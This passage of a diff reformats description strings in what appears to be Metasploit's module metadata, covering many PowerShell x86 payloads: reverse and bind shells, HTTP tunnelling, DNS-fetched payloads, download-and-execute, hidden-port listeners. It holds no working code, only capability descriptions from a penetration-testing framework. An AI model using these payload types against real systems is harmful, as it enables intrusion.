-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker with UUID Support",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -177869,7 +178434,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP (Windows winhttp)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows winhttp)",
    "references": [

    ],
@@ -177906,7 +178471,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTPS (Windows winhttp)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows winhttp)",
    "references": [

    ],
@@ -177944,7 +178509,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -177983,7 +178548,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178021,7 +178586,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for an IPv6 connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178060,7 +178625,7 @@
      "skape <mmiller@hick.org>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178097,7 +178662,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "UserExistsError"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a pipe connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178134,7 +178699,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178172,7 +178737,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178212,7 +178777,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178250,7 +178815,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178287,7 +178852,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Use an established connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178326,7 +178891,7 @@
      "bannedit <bannedit@metasploit.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. \n        Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\n        data/hop/hop.php to the PHP server you wish to use as a hop.",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\ndata/hop/hop.php to the PHP server you wish to use as a hop.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178363,7 +178928,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Tunnel communication over HTTP (Windows wininet)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178400,7 +178965,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Tunnel communication over HTTP",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178438,7 +179003,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker over IPv6",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178475,7 +179040,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178512,7 +179077,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178550,7 +179115,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178588,7 +179153,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178627,7 +179192,7 @@
      "skape <mmiller@hick.org>",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178667,7 +179232,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178707,7 +179272,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178745,7 +179310,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker with UUID Support",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178783,7 +179348,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Tunnel communication over HTTP (Windows winhttp)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178819,7 +179384,7 @@
      "Spencer McIntyre",
      "corelanc0d3r <peter.ve@corelan.be>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Performs a TXT query against a series of DNS record(s) and executes the returned payload",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nPerforms a TXT query against a series of DNS record(s) and executes the returned payload",
    "references": [

    ],
@@ -178854,7 +179419,7 @@
      "Spencer McIntyre",
      "corelanc0d3r <peter.ve@corelan.be>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Download an EXE from an HTTP(S)/FTP URL and execute it",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nDownload an EXE from an HTTP(S)/FTP URL and execute it",
    "references": [

    ],
@@ -178965,7 +179530,7 @@
      "Spencer McIntyre",
      "robert <robertmetasploit@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Generate a debug trap in the target process",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nGenerate a debug trap in the target process",
    "references": [

    ],
@@ -179000,7 +179565,7 @@
      "Spencer McIntyre",
      "jduck <jduck@metasploit.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Generate a tight loop in the target process",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nGenerate a tight loop in the target process",
    "references": [

    ],
@@ -179072,7 +179637,7 @@
      "corelanc0d3r <peter.ve@corelan.be>",
      "jduck <jduck@metasploit.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawns a dialog via MessageBox using a customizable title, text & icon",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawns a dialog via MessageBox using a customizable title, text & icon",
    "references": [

    ],
@@ -179111,7 +179676,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179151,7 +179716,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179190,7 +179755,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for an IPv6 connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179229,7 +179794,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179268,7 +179833,7 @@
      "OJ Reeves",
      "UserExistsError"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a pipe connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179307,7 +179872,7 @@
      "OJ Reeves",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179346,7 +179911,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179387,7 +179952,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179426,7 +179991,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179464,7 +180029,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Use an established connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179505,7 +180070,7 @@
      "bannedit <bannedit@metasploit.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. \n        Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\n        data/hop/hop.php to the PHP server you wish to use as a hop.",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\ndata/hop/hop.php to the PHP server you wish to use as a hop.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179544,7 +180109,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Tunnel communication over HTTP (Windows wininet)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179583,7 +180148,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Tunnel communication over HTTP",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179622,7 +180187,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Tunnel communication over HTTPS (Windows wininet)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTPS (Windows wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179663,7 +180228,7 @@
      "corelanc0d3r <peter.ve@corelan.be>",
      "amaloteaux <alex_maloteaux@metasploit.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Tunnel communication over HTTP using SSL with custom proxy support",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP using SSL with custom proxy support",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179702,7 +180267,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker over IPv6",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179740,7 +180305,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker via a named pipe pivot",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179779,7 +180344,7 @@
      "OJ Reeves",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179818,7 +180383,7 @@
      "OJ Reeves",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179857,7 +180422,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179896,7 +180461,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179936,7 +180501,7 @@
      "hdm <x@hdm.io>",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179977,7 +180542,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -180018,7 +180583,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -180057,7 +180622,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker with UUID Support",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -180097,7 +180662,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Tunnel communication over HTTP (Windows winhttp)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -180137,7 +180702,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Tunnel communication over HTTPS (Windows winhttp)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTPS (Windows winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -180173,7 +180738,7 @@
      "Spencer McIntyre",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Stub payload for interacting with a Meterpreter Service",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nStub payload for interacting with a Meterpreter Service",
    "references": [

    ],
@@ -180208,7 +180773,7 @@
      "Spencer McIntyre",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Stub payload for interacting with a Meterpreter Service",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nStub payload for interacting with a Meterpreter Service",
    "references": [

    ],
@@ -180247,7 +180812,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [

    ],
@@ -180286,7 +180851,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [

    ],
@@ -180324,7 +180889,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for an IPv6 connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)",
    "references": [

    ],
@@ -180363,7 +180928,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -180400,7 +180965,7 @@
      "skape <mmiller@hick.org>",
      "UserExistsError"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a pipe connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)",
    "references": [

    ],
@@ -180437,7 +181002,7 @@
      "skape <mmiller@hick.org>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)",
    "references": [

    ],
@@ -180475,7 +181040,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)",
    "references": [

    ],
@@ -180515,7 +181080,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection",
    "references": [

    ],
@@ -180553,7 +181118,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -180589,7 +181154,7 @@
      "jt <jt@klake.org>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Use an established connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection",
    "references": [

    ],
@@ -180627,7 +181192,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker over IPv6",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6",
    "references": [

    ],
@@ -180664,7 +181229,7 @@
      "skape <mmiller@hick.org>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)",
    "references": [

    ],
@@ -180701,7 +181266,7 @@
      "skape <mmiller@hick.org>",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -180739,7 +181304,7 @@
